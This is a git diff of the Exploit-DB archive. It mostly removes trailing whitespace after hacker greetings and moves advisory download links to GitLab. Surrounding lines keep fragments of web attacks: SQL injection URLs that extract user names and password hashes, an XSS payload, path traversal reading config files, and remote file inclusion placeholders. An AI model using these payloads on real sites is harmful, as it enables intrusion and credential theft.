=========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf) diff --git a/exploits/php/webapps/12339.txt b/exploits/php/webapps/12339.txt index 3ba0b8595..1f2dc4766 100644 --- a/exploits/php/webapps/12339.txt +++ b/exploits/php/webapps/12339.txt @@ -19,7 +19,7 @@ Note that other properties of a Graph Template might also be affected. =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12339.pdf (Bonsai-OS_Command_Injection_in_Cacti.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12339.pdf (Bonsai-OS_Command_Injection_in_Cacti.pdf) diff --git a/exploits/php/webapps/12395.txt b/exploits/php/webapps/12395.txt index 72a344cab..acaab7f6c 100644 --- a/exploits/php/webapps/12395.txt +++ b/exploits/php/webapps/12395.txt @@ -34,7 +34,4 @@ ShoutZ : Greetz : -------- - ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- - - - + ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- \ No newline at end of file diff --git a/exploits/php/webapps/12410.txt b/exploits/php/webapps/12410.txt index 9bd78730a..62416aba8 100644 --- a/exploits/php/webapps/12410.txt +++ b/exploits/php/webapps/12410.txt @@ -26,9 +26,4 @@ modules.php?op=modload&name=News&file=article&sid=[ SQL ] [ Demo] -http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- - - - - - +http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- \ No newline at end of file diff --git a/exploits/php/webapps/12415.txt b/exploits/php/webapps/12415.txt index 228119745..0427ca244 100644 --- a/exploits/php/webapps/12415.txt +++ b/exploits/php/webapps/12415.txt @@ -22,6 +22,4 @@ ShoutZ : Greetz : -------- - ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR-- - - + ---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MaYuR-- \ No newline at end of file diff --git a/exploits/php/webapps/12552.txt b/exploits/php/webapps/12552.txt index fd74c6591..867918ac3 100644 --- a/exploits/php/webapps/12552.txt +++ b/exploits/php/webapps/12552.txt @@ -20,4 +20,4 @@ http://localhost/teknoportal/makale.php?id=-1+union+select+0,1,version(),3,4,5,6 ------------------------------------------------------------------------------------------- -Herşey Vatan İçin; +Herşey Vatan İçin; \ No newline at end of file diff --git a/exploits/php/webapps/12591.txt b/exploits/php/webapps/12591.txt index a336b0ace..a666e2f6d 100644 --- a/exploits/php/webapps/12591.txt +++ b/exploits/php/webapps/12591.txt @@ -32,4 +32,4 @@ line ; 51 and 52 my friend : liar - sm Hacker -baby hacker -dmar - mr.JLD - ALhal alsab - adil - Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - - yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - + yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - \ No newline at end of file diff --git a/exploits/php/webapps/12596.txt b/exploits/php/webapps/12596.txt index 754b7e6ee..3696ae540 100644 --- a/exploits/php/webapps/12596.txt +++ b/exploits/php/webapps/12596.txt @@ -50,4 +50,4 @@ and when you put {order+by+1} after id you can see the normal page # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/12597.txt b/exploits/php/webapps/12597.txt index 172ecc967..b0a139010 100644 --- a/exploits/php/webapps/12597.txt +++ b/exploits/php/webapps/12597.txt @@ -41,4 +41,4 @@ page.php?id=-4+union+all+select+1,@@version,3,4-- # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/12617.txt b/exploits/php/webapps/12617.txt index 92bd21777..436f94391 100644 --- a/exploits/php/webapps/12617.txt +++ b/exploits/php/webapps/12617.txt @@ -27,5 +27,5 @@ Test Environment: ==================================================================== Download the following file for more instructions and exploits: -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12617.zip (file_thingie_v255_Jeremiah.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12617.zip (file_thingie_v255_Jeremiah.zip) ==================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/12635.txt b/exploits/php/webapps/12635.txt index 2192d09fd..28a651b26 100644 --- a/exploits/php/webapps/12635.txt +++ b/exploits/php/webapps/12635.txt @@ -29,6 +29,4 @@ HCJ - g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers ! - - + g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers ! \ No newline at end of file diff --git a/exploits/php/webapps/12651.txt b/exploits/php/webapps/12651.txt index 3fa61c0cd..165f9f4e4 100644 --- a/exploits/php/webapps/12651.txt +++ b/exploits/php/webapps/12651.txt @@ -25,7 +25,4 @@ * Fuck to Malaysia <= the truly thief asia * For HaMaDa SCoOoRPioN are you layz????? copy my exploit??? http://securityreason.com/securityalert/7161 - http://securityreason.com/exploitalert/7413 Look Date!!! your copy my style!!! - - - + http://securityreason.com/exploitalert/7413 Look Date!!! your copy my style!!! \ No newline at end of file diff --git a/exploits/php/webapps/12671.txt b/exploits/php/webapps/12671.txt index 0672e30ed..e455c727d 100644 --- a/exploits/php/webapps/12671.txt +++ b/exploits/php/webapps/12671.txt @@ -39,5 +39,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12709.txt b/exploits/php/webapps/12709.txt index 50d4794b9..d6921d3bf 100644 --- a/exploits/php/webapps/12709.txt +++ b/exploits/php/webapps/12709.txt @@ -46,8 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12713.txt b/exploits/php/webapps/12713.txt index af9a1315d..7668bfc3e 100644 --- a/exploits/php/webapps/12713.txt +++ b/exploits/php/webapps/12713.txt @@ -46,6 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12714.txt b/exploits/php/webapps/12714.txt index 9c16a4dce..cd9bb1362 100644 --- a/exploits/php/webapps/12714.txt +++ b/exploits/php/webapps/12714.txt @@ -46,6 +46,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12735.txt b/exploits/php/webapps/12735.txt index 0b2844661..244d4fd32 100644 --- a/exploits/php/webapps/12735.txt +++ b/exploits/php/webapps/12735.txt @@ -50,6 +50,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12761.txt b/exploits/php/webapps/12761.txt index ccf270f84..2f8d5bf6d 100644 --- a/exploits/php/webapps/12761.txt +++ b/exploits/php/webapps/12761.txt @@ -45,9 +45,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/12793.txt b/exploits/php/webapps/12793.txt index 1861a5781..dc3ae2260 100644 --- a/exploits/php/webapps/12793.txt +++ b/exploits/php/webapps/12793.txt @@ -47,9 +47,4 @@ am nt hacker just Lik3 Syst3m S3curity .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - - - + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/exploits/php/webapps/13776.txt b/exploits/php/webapps/13776.txt index 5a77f7656..edf2681be 100644 --- a/exploits/php/webapps/13776.txt +++ b/exploits/php/webapps/13776.txt @@ -16,4 +16,4 @@ user who is able to add or modify Vendors, Customers, Employees or Inventary ite Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13776.pdf (cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13776.pdf (cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf) \ No newline at end of file diff --git a/exploits/php/webapps/13777.txt b/exploits/php/webapps/13777.txt index ca28b02a3..a8727c1b7 100644 --- a/exploits/php/webapps/13777.txt +++ b/exploits/php/webapps/13777.txt @@ -17,4 +17,4 @@ The files are included into the scripts and its contents executed by the server. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13777.pdf (cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13777.pdf (cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf) \ No newline at end of file diff --git a/exploits/php/webapps/13778.txt b/exploits/php/webapps/13778.txt index f092efa05..c91539c4e 100644 --- a/exploits/php/webapps/13778.txt +++ b/exploits/php/webapps/13778.txt @@ -16,4 +16,4 @@ move up to root directory, thus permitting navigation through the file system. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13778.pdf (cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13778.pdf (cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf) \ No newline at end of file diff --git a/exploits/php/webapps/14160.txt b/exploits/php/webapps/14160.txt index 0f51f80ac..12cd101af 100644 --- a/exploits/php/webapps/14160.txt +++ b/exploits/php/webapps/14160.txt @@ -22,5 +22,4 @@ Content-Length: 146 op=add&userid=consultor1&password_changed=true&PASS1=xxxx&PASS2=xxxx&desc=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&access_rights=reportonly #################################################################################### -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14160.pdf - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14160.pdf \ No newline at end of file diff --git a/exploits/php/webapps/14199.txt b/exploits/php/webapps/14199.txt index 59bec8ebf..439df6a5f 100644 --- a/exploits/php/webapps/14199.txt +++ b/exploits/php/webapps/14199.txt @@ -67,4 +67,4 @@ Put [SQL CODE] >>> Proude To Be A Kashmiri+Pakistani<<< >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 +>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010 \ No newline at end of file diff --git a/exploits/php/webapps/14426.pl b/exploits/php/webapps/14426.pl index 0b0353bcb..ca0589871 100755 --- a/exploits/php/webapps/14426.pl +++ b/exploits/php/webapps/14426.pl @@ -68,4 +68,4 @@ sub exploit () } #Exploit failed... print "- Exploit failed\n" -} +} \ No newline at end of file diff --git a/exploits/php/webapps/14458.txt b/exploits/php/webapps/14458.txt index 140c2009f..ccf715f89 100644 --- a/exploits/php/webapps/14458.txt +++ b/exploits/php/webapps/14458.txt @@ -37,4 +37,4 @@ http://www.Victime.com/sNews/index.php?id= ==================================================== -Greetingz To SlaSSi & Xella +Greetingz To SlaSSi & Xella \ No newline at end of file diff --git a/exploits/php/webapps/14502.txt b/exploits/php/webapps/14502.txt index 1e0e2a4a9..d93250e38 100644 --- a/exploits/php/webapps/14502.txt +++ b/exploits/php/webapps/14502.txt @@ -19,5 +19,4 @@ http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1 +Union+select+user()+from+jos_users-- ############################################################ Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM" -############################################################ - +############################################################ \ No newline at end of file diff --git a/exploits/php/webapps/14556.txt b/exploits/php/webapps/14556.txt index d6c28f04d..ef451f009 100644 --- a/exploits/php/webapps/14556.txt +++ b/exploits/php/webapps/14556.txt @@ -19,4 +19,4 @@ SQL Error => www.site.com/modules/Partenaires/clic.php?id=8 [Blind] -#################################################################### +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/14592.txt b/exploits/php/webapps/14592.txt index 8f0e43899..3544bfe00 100644 --- a/exploits/php/webapps/14592.txt +++ b/exploits/php/webapps/14592.txt @@ -21,5 +21,4 @@ http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT +Union+select+user()+from+jos_users-- ############################################################ #.Türk oğlu, !!..Türk kızı !!..Türklügünü Koru!.. -############################################################ - +############################################################ \ No newline at end of file diff --git a/exploits/php/webapps/14618.txt b/exploits/php/webapps/14618.txt index a68c86159..4af1c6f2f 100644 --- a/exploits/php/webapps/14618.txt +++ b/exploits/php/webapps/14618.txt @@ -14,6 +14,4 @@ Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/com_del.php?clas ____________________________________________ A special tribute to: -DannY.iRaQi - TeaM iRaQ HaCkers - - +DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14637.txt b/exploits/php/webapps/14637.txt index 93b3117ae..882988999 100644 --- a/exploits/php/webapps/14637.txt +++ b/exploits/php/webapps/14637.txt @@ -32,4 +32,4 @@ Column : 1064 http://127.0.0.1/path/video.php?id=-4444 union select swfurl 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from archive -=========================================================================================== +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/14639.txt b/exploits/php/webapps/14639.txt index dc1f7313d..809bee0bd 100644 --- a/exploits/php/webapps/14639.txt +++ b/exploits/php/webapps/14639.txt @@ -9,7 +9,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L] +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14655.txt b/exploits/php/webapps/14655.txt index 439a47c2e..114a46b93 100644 --- a/exploits/php/webapps/14655.txt +++ b/exploits/php/webapps/14655.txt @@ -23,4 +23,4 @@ http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&se Greetz @ MCA-CRB All "DZ" "MusliM" ############################################################ ======[saha fotorkom]====== -############################################################ +############################################################ \ No newline at end of file diff --git a/exploits/php/webapps/14659.txt b/exploits/php/webapps/14659.txt index fc64065be..830b81867 100644 --- a/exploits/php/webapps/14659.txt +++ b/exploits/php/webapps/14659.txt @@ -31,4 +31,4 @@ http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- ŞeHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen LeşLer, SiZi Kim DiRiLTecek?.. =================================================== -Greetz : 1923Turk All Users +Greetz : 1923Turk All Users \ No newline at end of file diff --git a/exploits/php/webapps/14712.txt b/exploits/php/webapps/14712.txt index 8680a13f6..74435f680 100644 --- a/exploits/php/webapps/14712.txt +++ b/exploits/php/webapps/14712.txt @@ -9,9 +9,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL] +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14722.txt b/exploits/php/webapps/14722.txt index 9c5851b95..6cb9f4129 100644 --- a/exploits/php/webapps/14722.txt +++ b/exploits/php/webapps/14722.txt @@ -60,5 +60,4 @@ Joomla! (Multiple) ExploiT # Thanks : milw0rm.com & exploit-db.com & offsec.com & inj3ct0r.com & www.hack0wn.com -exit ,, / Praise be to God for the blessing of Islam - +exit ,, / Praise be to God for the blessing of Islam \ No newline at end of file diff --git a/exploits/php/webapps/14799.txt b/exploits/php/webapps/14799.txt index f21db0e26..a22ea50b8 100644 --- a/exploits/php/webapps/14799.txt +++ b/exploits/php/webapps/14799.txt @@ -9,9 +9,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL] +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - - +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/exploits/php/webapps/14817.txt b/exploits/php/webapps/14817.txt index 6ea49272d..a1e7851ec 100644 --- a/exploits/php/webapps/14817.txt +++ b/exploits/php/webapps/14817.txt @@ -41,4 +41,4 @@ SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ===========================all my friend =================================== * PrX Hacker * Hacker Boy * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi | -* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | +* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | \ No newline at end of file diff --git a/exploits/php/webapps/14819.html b/exploits/php/webapps/14819.html index 809f2056a..83cc98e1a 100644 --- a/exploits/php/webapps/14819.html +++ b/exploits/php/webapps/14819.html @@ -50,4 +50,4 @@ Email : R7e@HoTMaiL.coM

- + \ No newline at end of file diff --git a/exploits/php/webapps/14823.txt b/exploits/php/webapps/14823.txt index e91c86451..0b9d5b53c 100644 --- a/exploits/php/webapps/14823.txt +++ b/exploits/php/webapps/14823.txt @@ -34,4 +34,4 @@ SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited * Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | -=========================| -=[ THE END]=- |========================= +=========================| -=[ THE END]=- |========================= \ No newline at end of file diff --git a/exploits/php/webapps/14827.py b/exploits/php/webapps/14827.py index e0c530e37..c5d90b879 100755 --- a/exploits/php/webapps/14827.py +++ b/exploits/php/webapps/14827.py @@ -77,7 +77,4 @@ if len(sys.argv) != 4: else: exploit(sys.argv[1], sys.argv[2], sys.argv[3]) -exit(0) - - - +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/14834.txt b/exploits/php/webapps/14834.txt index cceb283ae..c4dd762cf 100644 --- a/exploits/php/webapps/14834.txt +++ b/exploits/php/webapps/14834.txt @@ -31,4 +31,4 @@ Add A New Comment And The exploit is in Name :) -Peace +Peace \ No newline at end of file diff --git a/exploits/php/webapps/14837.txt b/exploits/php/webapps/14837.txt index ef8af06a4..7c6ccf176 100644 --- a/exploits/php/webapps/14837.txt +++ b/exploits/php/webapps/14837.txt @@ -25,5 +25,4 @@ http://localhost/cf_image_host_v1.3.81/inc/config.php?settings[SET_LANGUAGE]=[EV ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz -Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE - +Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE \ No newline at end of file diff --git a/exploits/php/webapps/14839.txt b/exploits/php/webapps/14839.txt index 9bbe338d4..d1e0d69ee 100644 --- a/exploits/php/webapps/14839.txt +++ b/exploits/php/webapps/14839.txt @@ -30,5 +30,4 @@ Put on the name & body of your comment any html code like: <==== ( thats redirecting to sa-virus.com ) [~] Another note : You can bypass the limit of comments per day in this guestbook script -By deleting the saved cookie in your computer ;) - +By deleting the saved cookie in your computer ;) \ No newline at end of file diff --git a/exploits/php/webapps/14841.txt b/exploits/php/webapps/14841.txt index 14ce61319..67733f1a1 100644 --- a/exploits/php/webapps/14841.txt +++ b/exploits/php/webapps/14841.txt @@ -29,5 +29,4 @@ http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L] ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz -Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE - +Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE \ No newline at end of file diff --git a/exploits/php/webapps/14849.py b/exploits/php/webapps/14849.py index b081f496a..201cbb4f1 100755 --- a/exploits/php/webapps/14849.py +++ b/exploits/php/webapps/14849.py @@ -78,6 +78,4 @@ if len(sys.argv) != 3: else: exploit(sys.argv[1], sys.argv[2]) -exit(0) - - +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/14860.txt b/exploits/php/webapps/14860.txt index 0273b94e4..5997f160d 100644 --- a/exploits/php/webapps/14860.txt +++ b/exploits/php/webapps/14860.txt @@ -14,4 +14,4 @@ http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sb [#] Greetings: -[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ... +[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ... \ No newline at end of file diff --git a/exploits/php/webapps/14891.txt b/exploits/php/webapps/14891.txt index 1b3cb921a..9c84e6dba 100644 --- a/exploits/php/webapps/14891.txt +++ b/exploits/php/webapps/14891.txt @@ -14,4 +14,4 @@ http://www.example.com/classi/detail.php?sid=80 and 1=2-- // False ,, [~] Greetings: -string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends"); +string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends"); \ No newline at end of file diff --git a/exploits/php/webapps/14894.py b/exploits/php/webapps/14894.py index be49b33bd..86e8f9dbb 100755 --- a/exploits/php/webapps/14894.py +++ b/exploits/php/webapps/14894.py @@ -110,5 +110,4 @@ if len(sys.argv) != 3: else: exploit(sys.argv[1], sys.argv[2]) -exit(0) - +exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/14896.txt b/exploits/php/webapps/14896.txt index 67f97751a..442073d6c 100644 --- a/exploits/php/webapps/14896.txt +++ b/exploits/php/webapps/14896.txt @@ -9,9 +9,4 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~] -Greetings: No - - - - - +Greetings: No \ No newline at end of file diff --git a/exploits/php/webapps/14910.txt b/exploits/php/webapps/14910.txt index c8986f8c3..cb537aa19 100644 --- a/exploits/php/webapps/14910.txt +++ b/exploits/php/webapps/14910.txt @@ -30,4 +30,4 @@ else { cout<<"No greeting ..\n"; } -=========================================================== +=========================================================== \ No newline at end of file diff --git a/exploits/php/webapps/14915.txt b/exploits/php/webapps/14915.txt index 0b918e117..a052dc079 100644 --- a/exploits/php/webapps/14915.txt +++ b/exploits/php/webapps/14915.txt @@ -149,5 +149,4 @@ InterPhoto CMS has used Smarty library(Templet Engine). Add frist page : if(class_exists('Smarty')){ Add last page: - } - + } \ No newline at end of file diff --git a/exploits/php/webapps/14927.txt b/exploits/php/webapps/14927.txt index 8d0e79d7d..c7d1c4949 100644 --- a/exploits/php/webapps/14927.txt +++ b/exploits/php/webapps/14927.txt @@ -64,6 +64,4 @@ DynPage is written in PHP and does not require MySQL database. It's easy to inst $_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com"; ?> +POC:for see this hash: - http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 - - + http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 \ No newline at end of file diff --git a/exploits/php/webapps/14931.php b/exploits/php/webapps/14931.php index 935e71951..f15d58958 100644 --- a/exploits/php/webapps/14931.php +++ b/exploits/php/webapps/14931.php @@ -121,5 +121,4 @@ $guyanarules = new Javabridgexploit($argv); -?> - +?> \ No newline at end of file diff --git a/exploits/php/webapps/14960.txt b/exploits/php/webapps/14960.txt index eb86a92c1..06073d6e3 100644 --- a/exploits/php/webapps/14960.txt +++ b/exploits/php/webapps/14960.txt @@ -14,4 +14,4 @@ +Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip +Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../***** +Password Exploitable : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php ------------------------------------------------------------------------------------------ +----------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/14985.txt b/exploits/php/webapps/14985.txt index 9617191a2..ed598bbef 100644 --- a/exploits/php/webapps/14985.txt +++ b/exploits/php/webapps/14985.txt @@ -30,5 +30,4 @@ Greetz to all brothers & sisters who are fighting for freedom in IRAN... خدا شما کمک خواهد کرد -contact : secret_hf@hotmail.com - +contact : secret_hf@hotmail.com \ No newline at end of file diff --git a/exploits/php/webapps/14989.txt b/exploits/php/webapps/14989.txt index b646f981b..b13012c13 100644 --- a/exploits/php/webapps/14989.txt +++ b/exploits/php/webapps/14989.txt @@ -57,4 +57,4 @@ Muslim & Tunisian Hacker EnJoY o_O -./3x17 +./3x17 \ No newline at end of file diff --git a/exploits/php/webapps/14996.txt b/exploits/php/webapps/14996.txt index 4d8a81ca0..e746f430f 100644 --- a/exploits/php/webapps/14996.txt +++ b/exploits/php/webapps/14996.txt @@ -28,4 +28,4 @@ in GetTemplate function , line 113 to 127 [#] Greetings: Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,, -== +== \ No newline at end of file diff --git a/exploits/php/webapps/15090.txt b/exploits/php/webapps/15090.txt index 6e3487ada..ba1dc38c0 100644 --- a/exploits/php/webapps/15090.txt +++ b/exploits/php/webapps/15090.txt @@ -36,4 +36,4 @@ http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,pas -Good Luck +Good Luck \ No newline at end of file diff --git a/exploits/php/webapps/15121.txt b/exploits/php/webapps/15121.txt index 157e13c45..df58862d8 100644 --- a/exploits/php/webapps/15121.txt +++ b/exploits/php/webapps/15121.txt @@ -56,5 +56,4 @@ Mail : !x! -{Greetz} All my friends |No-Exploit.com Members 